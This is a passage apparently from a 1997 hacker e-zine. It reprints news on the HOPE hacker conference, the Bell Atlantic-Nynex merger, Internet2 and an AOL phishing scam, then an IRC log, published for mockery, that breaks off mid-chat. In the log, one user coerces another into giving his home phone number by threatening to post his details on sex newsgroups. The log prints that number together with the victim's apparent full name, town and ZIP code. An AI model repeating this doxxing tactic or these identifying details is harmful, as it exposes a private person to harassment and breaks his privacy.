low hacker batting average (only 20 percent of all government computer 
systems have been hacked). His address was putatively a history of hacking in 
America, but it sounded more like a call to arms for the audience. "You're 
going to have to learn how to hack the media, because you haven't been doing 
a good job of it," Meeks said.  

Indeed, hackers get their share of bad press, and they gripe about it to no 
end. And HOPE highlighted the split personality hackers bring to their 
relationship with the media. Like most groups, they lambaste journalists. Yet 
their keynote speaker wasn't an agent provocateur, but a member of the press 
(albeit an esteemed one who champions the hacker cause). There was a panel 
discussion (which I participated in) where hackers could finally turn the 
tables on the media in attendance. "No weapons allowed," said the schedule of 
events. Yet only one of the audience's questions criticized the press, 
specifically noting John Markoff and his book on Kevin Mitnick. There was 
even a "Media Portrayal of Hackers" survey being distributed by a University 
of Tennessee sociology student as part of his master's thesis.  

Perhaps it's useless to analyze hacker-vs.-media steretypes. After all, the 
hacker community has shown that it can successfully run its own magazines, 
pirate radio stations and web sites. If it's true that information technology 
is going to obliterate old media, the horsemen of the apocalypse are more 
likely riding from alt.2600 than from Wired. "The whole 2600 thing is a media 
hack," admitted Goldstein. And the success of this year's HOPE showed not 
only that Goldstein knows how to co-opt the media but that he might be a damn 
good entrepreneur as well.    

�1997 CNN
�������������������������������������������������������������
 
 Bell Atlantic-Nynex Merger Gets Final OK 
 (08/14/97)
 By Kora McNaughton, TechInvestor

 WASHINGTON -- The Federal Communications Commission Thursday approved the 
 merger of Nynex and Bell Atlantic, creating the second-largest phone company 
 in the United States. 

Although the FCC's blessing was not altogether unexpected, Wall Street 
welcomed the news, pushing both companies' stock up after the late afternoon 
announcement. Bell Atlantic [BEL] gained 1 1/4 to close at 75 15/16; Nynex 
[NYN] closed up 1 1/8 at 58 1/16. 

Last month, after the two companies proposed conditions designed to promote 
competition in their markets, the agency's chairman, Reed Hundt said he was 
ready to approve the deal. Hundt stumped for a new telecommunications law on 
Thursday. 

In a joint announcement, Nynex and Bell Atlantic said they are "pleased" that 
the agency unanimously agreed to the merger, which will close "as soon as 
possible." 

The $23 billion merger, first announced in April of 1996, will create a phone 
company with a presence in markets covering most of the Eastern seaboard, 
serving 40 million phone access lines and 5.5 million wireless customers. It 
will be headquartered in New York. 

Since the merger was announced, Bell Atlantic and Nynex have been dancing 
with regulators on both the Federal and local levels. 

Commissioner Rachelle B. Chong said in a statement Thursday the FCC approved 
the deal "only after a very careful analysis of the likely market effects of 
the merger, and the imposition of certain enforceable pro-competitive 
conditions to help ensure that the local network is opened -- and stays 
opened -- to new competitors." 

The conditions include providing detailed performance reports to competitors 
and regulators, offering interconnection, network element, transport, and 
termination at rates based on forward-looking economic costs, and offering 
shared transport priced by the minute and routed just as Bell Atlantic's own 
traffic, without access charges. 

Bell Atlantic and Nynex proposed the conditions July 19, one day after the 
Eighth U.S. Circuit Court in St. Louis ruled that the FCC had exceeded its 
authority by trying to set the prices new entrants will pay for access to 
local phone networks. The Baby Bells built the networks, but now must share 
them with competitors. 

Long-distance companies such as AT&T and MCI have accused the RBOCs of 
delaying required upgrades to the local networks to allow for competition; 
earlier this week, MCI complained Nynex was taking too long to process orders 
for MCI local service in New York, thereby slowing MCI's growth in that 
region. 

In a statement after the ruling Thursday, MCI Chief Policy Counsel Jonathan 
Sallet praised the FCC. "The conditions that have been announced today and 
that will be enforced by the FCC will help to alleviate the anticompetitive 
impact of the Bell Atlantic-Nynex merger," he said. 

�CMP Media, 1996.
�������������������������������������������������������������
 
 Getting Ready For Internet2 
 (08/18/97)
 By Larry Lange, Electronics Engineering Times

 ANN ARBOR, Mich. -- The effort to build Internet2--an academic and 
 government research-only network separate from the increasingly 
 commercialized Internet--is kicking into high gear following a series of 
 technical meetings this summer.

The effort is rapidly picking up participants from universities that want to 
log on to the proposed high-speed, multimedia-oriented network. And 
communications OEMs are eyeing Internet2 as an ideal test bed for their 
next-generation systems. 

Having completed a critical technical workshop here early this month and one 
in July in Denver, the Internet2 organization is pushing to meet its 
self-imposed deadlines for bringing its network live by year's end, with 
three university members to be connected as early as this month. 

The network promises benefits for commercial as well as academic Internet 
users. Obviously, offloading institutional traffic from the commercial 
Internet will speed transmissions for both Internet and Internet2 users. 

But the "I2" will also "speed the development of new network features and 
functionality," said Charles Lee, senior manager of Internet2 interests for 
MCI Communications Inc. Those features and functions "could then be 
incorporated into the commercial Internet," Lee said. 

The work is coming at a time when the underlying base technology of the 
Internet Protocol is being pulled in many directions. In this environment, 
communications OEMs are eager for a safe haven to test out future 
technologies. 

"Internet2 will provide a large-scale environment to try out new ideas and 
equipment running at speeds faster than any in operation with an intellectual 
community of users," said Stephen Wolff, director of business development for 
Cisco Systems Inc., a participant in the project. 

The Internet2 organization has grown from 34 members at its October inception 
to more than 100 research universities today. Notable government 
representatives hail from the U.S. Department of Energy and the National 
Science Foundation (NSF, Arlington, Va.). Several members are already 
engineering prototype network facilities, with the project's initial 
operations expected to begin by year's end. 

"We originally thought only 20 to 30 of the major research universities had 
such a high priority for continuing to build their network infrastructure 
that they would join the project," said Internet2 director Mike Roberts of 
Educom, a consortium of universities that promotes the use of information 
technology in education and research. "Obviously, we were wrong." 

So far, Internet2 university members have committed up to $50 million per 
year in new funding for the project, and the commercial sector--with project 
representation from such companies as Cisco, Lucent Technologies, Sun 
Microsystems, IBM, AT&T and Microsoft--has pledged more than $5 million. By 
contributing funding to university partners, the corporations can tap the 
project as a testbed for unproven Internet technologies--a task that's 
difficult to undertake on today's overcrowded Internet. 

Internet2 organizers are working with representatives from IBM, MCI, Cisco 
and other internetworking companies to discuss the needs of the system 
architects developing the advanced Internet2 nodes called Gigapops (points of 
presence)--the network aggregation points for the second-generation Internet 
wide-area network. 

Ted Hanss, director of applications development for the Internet2 project, 
told EE Times that such applications-enabling technologies as security, 
multicast and quality of service were among the important topics discussed at 
the summer meetings. The applications heading the list for I2 are 
collaborative environments, digital libraries, tele-immersion, tele-medicine 
and distance-independent instruction, Hanss said. 

Internet2 engineers have officially settled on an architecture of 
connectivity through Gigapops, which can swiftly connect the campuses, labs 
and, later, the urban-area and state/regional networks envisioned by the 
Clinton administration's Next-Generation Internet (NGI) initiative. 

Accordingly, Internet2 engineers look to deliver 622-Mbit/second 
transmissions to three supercomputer centers, running the Internet Protocol 
(IP) over an asynchronous-transfer-mode (ATM) network. And they want to boost 
bandwidth by nearly 14 percent for the University of Illinois National Center 
for Supercomputer Applications (NCSA), the San Diego Supercomputer Center and 
the Pittsburgh Supercomputer Center, with the promise of 20 more universities 
to be linked by this fall to Gigapops that will deliver data at speeds of at 
least 155 Mbits/s. (Current commercial transmission speeds top out at 45 
Mbits/s.) 

Other Internet2 project members have laid the foundations for connectivity to 
the network based on its anticipated speeds. A group of universities in 
California recently announced the building of an Internet2 network that will 
be designed to connect campuses at speeds of over 600 Mbits/s. 

"The electronic highway is faced with rush-hour traffic most of the day. We 
need reliable service delivery," said M. Stuart Lynn, associate vice 
president at the University of California and the principal investigator for 
the project. 

The participating schools include seven campuses of the University of 
California, along with the California Institute of Technology, California 
State University, Stanford University and the University of Southern 
California. Notable goals for the project will be the formation of a virtual 
university in which students can view publications from distant libraries and 
take classes located at other campuses. 

Internet2 is systematically swallowing up the National Science Foundation's 
Very High-Performance Backbone Network Service (vBNS). More than 50 Internet2 
institutions have received competitively awarded vBNS grants under the NSF's 
High Performance Connections program. 

In fact, vBNS could be considered the heart of Internet2, or at least its 
substantive launchpad. Begun in 1995, with an investment of $50 million under 
a five-year cooperative project with MCI, the service links six NSF 
supercomputer centers and was initially implemented to design and support 
"gigabit testbeds" for R&D of advanced networking technologies. The centers 
are located at the Cornell Theory Center, at NCSA and elsewhere. 

Those technologies included ATM/Sonet, the interfacing of ATM to the High 
Performance Parallel Interface and HiPPI switches, and all-optical 
networking. Each testbed addressed an application that required gigabit-speed 
networks. 

The trunk-line infrastructure for true broadband services to academia is 
being defined at a time when the core protocols for the Internet are being 
upgraded from the original transport and network protocols developed by the 
Advanced Research Projects Agency (now Darpa) in the 1980s. 

NSF program director Mark Luker said many of the problems restricting the 
commercialization of the original Internet "should be solved within the next 
few years using Internet2." Once traditional not-for-profit users move to the 
new network, Luker said, "it will be easier to implement pay schemes and give 
incentives to finance further Internet growth." 

Luker's comments underscore one of the motivations behind the 
administration's NGI initiative: relieving the current Internet's bandwidth 
bottlenecks. 

"This is an ongoing proposition. It won't stop with Internet2. I see an 
Internet3 and 4 in the near future," Luker said. By the end of 1998, 
Internet2 looks to have nearly all participating universities employing 
stable Internet2 connections. 

Projects under development with Internet2, Luker said, include digital 
multimedia libraries accessible in virtual reality, enhanced collaborative 
workplace communities with live digital video feeds, videoconferencing, 
collaborative computer-integrated manufacturing, weather forecasting and 
military-troop-movement monitoring. 

A briefing on Internet2 by the NASA Ames Research Center at Moffett Field 
(Mountain View, Calif.) drew more than 60 companies. "Although much of the 
research needed to make a new, superfast Internet is too risky and long-term 
for the private sector, our success will depend on partnerships with private 
industry and universities," Christine Falsetti, NGI project manager at Ames, 
said. 

NASA recently designated Ames the lead institution for the agency's $30 
million portion of a three-year, $300 million federal project to develop the 
NGI. "We want a network for researchers that is fast from end to end. And we 
will work with private companies on routers, switchers and computer 
workstations that will send computer information much faster than today's 
machines can send it," Falsetti said. 

One NASA goal is to create "co-laboratories" by linking labs, computers, 
databases and scientists from around the world via I2. Ames is organizing a 
September workshop for companies interested in such emerging applications. 

The NGI initiative was unveiled in October with three basic goals: to connect 
universities and national labs with high-speed networks that would be 100 to 
1,000 times faster than the commercial Internet; to promote experimentation 
with advanced multimedia technologies, such as real-time videoconferencing; 
and to demonstrate new applications that support scientific research, 
national security, distance education, environmental monitoring and health 
care. 

On the campaign trail, the Clinton administration promised $100 million in 
funding for its initiative. The funds are set for release in January. 

Internet2 spokesmen are quick to say that the network is not designed to 
replace the existing public Internet or to sidestep the NGI initiative. "The 
goals of Internet2 and of the NGI are entirely compatible and complementary," 
said Douglas Van Houweling, vice chairman of Internet2. "There is a 
compelling unanimity of purpose and direction." 

Yet Internet2 is not without its critics. There have been suggestions, for 
instance, that universities are leveraging the project to maintain a separate 
network presence. 

But Internet2 Steering Committee member Raman Khanna disputed that assertion. 
"At Stanford, where I work, only 15 percent of Internet traffic goes toward 
other universities," Khanna said. "The other 85 percent connects the school 
to the rest of the commercial network. Even if academia were to isolate its 
future, high-speed network system, it would speed up only 15 percent of its 
Internet traffic." 

Khanna also noted that the high-speed network is merely for the development 
of advanced applications and that any advances made will be available to all 
Internet users in three to five years. 

Another point of controversy is the government's role in funding specific 
university projects though Internet2. Several high-level lawmakers complained 
at recent Senate hearings that the NGI program favors urban areas and large 
universities. 

But Neal Lane, director of the National Science Foundation, said that 
Internet2 "is not an established infrastructure like a highway. It is a work 
in progress . . . and it is experimental. 

"That is the reason we need the nation's researchers to help us move 
forward." 

It remains to be seen whether the Internet2 body can pull off its monumental 
project and then seamlessly bring the network into line with the commercial 
Internet and provide bandwidth and multimedia solutions for the NGI, all by 
the slated deadline of 2000. If it can, the project will look to realize even 
more impressive goals. 

Internet2 plans to share discoveries with others in education worldwide. 
"This is the approach that characterized the first Internet," said NSF's 
Luker, "and it can work again with Internet2." 

�CMP Media, 1996.
�������������������������������������������������������������

 AOL urges its members to protect themselves    
 August 26, 1997
 By Franklin Paul

 NEW YORK (Reuter) - America Online Inc.'s subscribers can do as much, if not 
 more than the company can, to protect themselves from online theft and 
 fraud, a company executive said Tuesday following a recent scam.

The world's largest online service says smart members can do more to keep 
their personal information private than could any protective software program 
or lurking online police.

"If you want to protect yourself, you need to protect your personal 
information," Tatiana Gau, AOL's vice president of integrity assurance, said 
in an interview.

"We have a three-pronged approach; to educate, empower and enforce, where we 
put the tools in the hands of our members to allow them to protect 
themselves," against those who would take personal information to commit 
crimes like credit card fraud, she said.

The approach includes frequently reminding the service's more than 8 million 
members that AOL staff members will never ask for password or billing 
information, and telling them where to go to report a scam in action.

"People are beginning to realize that the same kind of scams that occur in 
real life do occur online," Gau said. "So in the same way in real life you 
would never dream of giving out your PIN number to your ATM card, you 
shoudn't be doing it online either."

Earlier this month, a scam was perpetrated on AOL whereby members received 
electronic mail that invited them to jump to a Web page which contained text 
of a letter from AOL Chairman Steve Case.

From there, another link asked members to enter billing information. Thinking 
they were providing data to AOL, they were really handing their vital 
information to thieves.

While Gau would not say how many members were duped by the scam, or if the 
perpetrators were caught, she said it was other AOL members that fingered the 
crooks.

"It was literally within a matter of hours of the mail being sent out that 
the e-mail was forwarded to us, which allowed us to very quickly get the site 
shut down," she said.

"The billing scam ... is really testimony to the fact that our ... mechanisms 
are working," she said.

She adds that the company's other security measures include adding alerts to 
the first screen that members see when they sign on and putting e-mail with 
safety tips in the mailboxes of new members.

AOL also urges members not to download files from sources they are unfamiliar 
with and it makes available free anti-virus software.

AOL's stock fell $1 to close at $66 on the New York Stock Exchange.

�Reuters Ltd.

������������������������������������������������������������������������������
��������������������������������������Ŀ
� Logs - Yaaay! It's IRC!!!            �
����������������������������������������
 
discore messing around with that always lame ZeR0-HeX:

Session Start: Mon Aug 18 01:31:53 1997
[1:31] <ZeR0-HeX> you're bullshitting
[1:31] <ZeR0-HeX> you don't know shit
[1:32] <ZeR0-HeX> if you really do know my phone number
[1:32] <ZeR0-HeX> tell it to me
<discore> ok!
Session Close: Mon Aug 18 01:33:16 1997

Session Start: Mon Aug 18 01:33:17 1997
[1:33] <ZeR0-HeX> may i ask where you received this information from?
<discore> my ereet hackmobile.
[1:33] <ZeR0-HeX> come on
[1:33] <ZeR0-HeX> i just wanna know
<discore> sorry tootsies, no can do
[1:33] <ZeR0-HeX> turn ur away message off!!!!!!!11
<discore> hmmm, whats yer phone #, i dont feel like calling the operator
[1:34] <ZeR0-HeX> alright
[1:34] <ZeR0-HeX> well
[1:34] <ZeR0-HeX> i believe ya
<discore> teehee
<discore> elite!
<discore> so
[1:35] <ZeR0-HeX> what do you intend to do with this information? i have done nothing wrong to 
  you. so please don't do anything bad
<discore> why did ya copy phrack?
[1:35] <ZeR0-HeX> oh
<discore> thats not very nice you know
[1:35] <ZeR0-HeX> so this is what it's about
[1:35] <ZeR0-HeX> ok
[1:35] <ZeR0-HeX> i'll explain
[1:35] <ZeR0-HeX> but
[1:35] <ZeR0-HeX> you gotta promise not give my info out to anyone
[1:35] <ZeR0-HeX> ok?
<discore> teehee
<discore> over 14,000 ppl have it
[1:36] <ZeR0-HeX> who?
<discore> woot
<discore> tell me why
<discore> i want to kn0w
[1:36] <ZeR0-HeX> wait
[1:36] <ZeR0-HeX> i'll tell you
[1:36] <ZeR0-HeX> but 1st
[1:36] <ZeR0-HeX> you gotta tell me where you got the info from
[1:36] <ZeR0-HeX> and you gotta tell me who the 14000 people are
[1:36] <ZeR0-HeX> and how theygot it
<discore> hmm, i dont know all the names of the 14,000 ppl
<discore> but i will check it!
<discore> ill make ya a deal, ok?
[1:37] <ZeR0-HeX> how the hell did 14000 people get it?
<discore> wanna deal?
[1:37] <ZeR0-HeX> sure
<discore> oK!
[1:37] * ZeR0-HeX listening
[1:37] <ZeR0-HeX> ???
<discore> tell me a real phone # of your house, and i will tell you what you want to know, if 
  the phone # is fake-o then inphoz get posted on alt.sex.*
[1:38] <ZeR0-HeX> why do you want my phone number?
[1:38] <ZeR0-HeX> so you can give it to the 14,000 people
[1:38] <ZeR0-HeX> nice try
<discore> cause im too lazy to call the operator
[1:38] <ZeR0-HeX> then you can bullshit me after
<discore> no actually i keep files on ppl
<discore> heh
<discore> and like, i just want it for personall use
<discore> i wont play with ya
[1:38] <ZeR0-HeX> who the fuck are you??
<discore> dont worry, i could still get it through other ways than you
[1:38] <ZeR0-HeX> why do you have my info???
<discore> im discore!
[1:39] <ZeR0-HeX> oh man..
<discore> thats what our deal is about buddy
<discore> its a fair trade
[1:39] <ZeR0-HeX> jeez, you're something :-)
[1:39] <ZeR0-HeX> what info do i want1!!
[1:39] <ZeR0-HeX> the only thing i want
[1:39] <ZeR0-HeX> is to not let the 14,000 people know
[1:39] <ZeR0-HeX> listen
[1:39] <ZeR0-HeX> if you were really a hacker
[1:40] <ZeR0-HeX> you would have known my number
<discore> well, you are right
<discore> BUT im lazy and bored tonight so you are my project
[1:41] <ZeR0-HeX> ok
[1:41] <ZeR0-HeX> if i give you my phone number
[1:41] <ZeR0-HeX> what would i get back in return
[1:41] <ZeR0-HeX> ABSOLUTELY SHIT
<discore> whatever you want out of me, sex or anything!
[1:41] <ZeR0-HeX> i still can't stop the 14000 people
[1:41] <ZeR0-HeX> lol
[1:41] <ZeR0-HeX> hehe
<discore> so
<discore> wanna do that?
[1:42] <ZeR0-HeX> ok
[1:42] <ZeR0-HeX> but wait
[1:42] <ZeR0-HeX> i'll giva ya my number
<discore> K!
[1:42] <ZeR0-HeX> but
[1:42] <ZeR0-HeX> what are you gonna tell me?
<discore> how the ppl got it, where they got it and why it was made public.
[1:42] <ZeR0-HeX> hmmm
[1:42] <ZeR0-HeX> ok
[1:42] <ZeR0-HeX> but
[1:43] <ZeR0-HeX> wait
[1:43] <ZeR0-HeX> after i give you the numer
[1:43] <ZeR0-HeX> number
[1:43] <ZeR0-HeX> you can't tell anyone it
[1:43] <ZeR0-HeX> ok?
<discore> i know!
[1:43] <ZeR0-HeX> no
[1:43] <ZeR0-HeX> don't bullshit me
<discore> why would i bullshit you?
[1:43] <ZeR0-HeX> this is serious shit
<discore> im getting something.
[1:43] <ZeR0-HeX> ok
[1:43] <ZeR0-HeX> dont tell anyone
[1:43] <ZeR0-HeX> ok
<discore> k..
[1:43] <ZeR0-HeX> fine
[1:43] <ZeR0-HeX> you go 1st
[1:43] <ZeR0-HeX> with the info
<discore> bahahaha
[1:43] <ZeR0-HeX> then i'll go
<discore> nein, cause i have something that is more important to you.
[1:44] <ZeR0-HeX> obviously i'll tell you the number!! i dont want my address and name posted 
  up everywhere in the internet
[1:44] <ZeR0-HeX> alright
[1:44] <ZeR0-HeX> alright
[1:44] <ZeR0-HeX> 860
[1:44] <ZeR0-HeX> 875
[1:44] <ZeR0-HeX> 2117
<discore> well teehee, i dont trust you, but you shouldnt trust me but im in control.
[1:44] <ZeR0-HeX> there
[1:44] <ZeR0-HeX> gimme a call tomorrow
[1:44] <ZeR0-HeX> :-)
[1:44] <ZeR0-HeX> ok
<discore> lemme look for a sec to verify
[1:44] <ZeR0-HeX> now can i have the info please?
[1:44] <ZeR0-HeX> ok
[1:44] <ZeR0-HeX> wait
[1:44] <ZeR0-HeX> hey
[1:44] <ZeR0-HeX> go to www.yahoo.com
[1:44] <ZeR0-HeX> go to people search
[1:45] <ZeR0-HeX> type in mumtaz alam
[1:45] <ZeR0-HeX> ellington, ct 06029
[1:45] <ZeR0-HeX> there, made it ez fer ya
<discore> extremly
<discore> i used yp.uswest.com
<discore> but thats ok!
<discore> now what you wanna know?
[1:45] <ZeR0-HeX> ok
[1:45] <ZeR0-HeX> the public crap?
[1:46] <ZeR0-HeX> how the 14000 people got it
[1:46] <ZeR0-HeX> etc.
[1:46] <ZeR0-HeX> how you got it
[1:46] <ZeR0-HeX> etc.
<discore> well, there is a land called #phreak
<discore> they owned you recently
[1:46] <ZeR0-HeX> grrrrrr
[1:46] <ZeR0-HeX> and....
<discore> well its not our fault you used your real name in email headers
[1:46] <ZeR0-HeX> what???
<discore> and ppl spread shit.
[1:46] <ZeR0-HeX> which one/?
[1:46] <ZeR0-HeX> not zer0-hex
[1:46] <ZeR0-HeX> what e-mail headers?
<discore> teehee
<discore> in your emails
<discore> it has your real name
<discore> aol does it by defult
<discore> :)
[1:47] <ZeR0-HeX> i use zer0-hex@juno.com
[1:47] <ZeR0-HeX> how did they get faraz outta that
[1:47] <ZeR0-HeX> huh?
<discore> well, heh, thats how we got it!
[1:47] <ZeR0-HeX> what has it?
[1:47] <ZeR0-HeX> where?
[1:47] <ZeR0-HeX> where????
<discore> settle young child of the force
[1:48] <ZeR0-HeX> well?
[1:48] <ZeR0-HeX> sometime today would be nice?
[1:48] <ZeR0-HeX> i'd like to get some sleep
<discore> i dont understand the question.
[1:48] <ZeR0-HeX> what e-mail header?
[1:48] <ZeR0-HeX> what about aol?
[1:48] <ZeR0-HeX> i dont have aol
<discore> well it seems you sent some mail from aol that contained your real name
[1:48] <ZeR0-HeX> huh?
[1:48] <ZeR0-HeX> where?
<discore> and that went public cause no one was hapy with you for copying phrack
[1:48] <ZeR0-HeX> when?
<discore> i dunno
<discore> geeze
<discore> im not god
[1:49] <ZeR0-HeX> i thought you had the answers
[1:49] <ZeR0-HeX> !!!
[1:49] <ZeR0-HeX> ok
[1:49] <ZeR0-HeX> now how did it get public?
[1:49] <ZeR0-HeX> and how did 14000 people get it?
<discore> ppl spread inphoz fastly in the hightech society we live in
<discore> well
<discore> not 1400
<discore> not 14000
<discore> i exaggeratted
[1:49] <ZeR0-HeX> but why would 14000 people want it?
<discore> for educational purposes
[1:49] <ZeR0-HeX> jeez
[1:50] <ZeR0-HeX> is uh
[1:50] <ZeR0-HeX> anyone gonna send me a bomb?
[1:50] <ZeR0-HeX> :-)
[1:50] <ZeR0-HeX> or gimme a 1000 prank calls
<discore> i hope not for your sake.
<discore> have you got anything yet?
<discore> trust me, the ppl who got these infoz could easily get your phone #, i just did it 
  first. teehee
[1:51] <ZeR0-HeX> what do you mean, have i got anything?
<discore> have you got any prank calls or any bombs or anything fun?
[1:51] <ZeR0-HeX> no
[1:51] <ZeR0-HeX> not yet..
[1:51] <ZeR0-HeX> :-)
[1:51] <ZeR0-HeX> hehe
<discore> then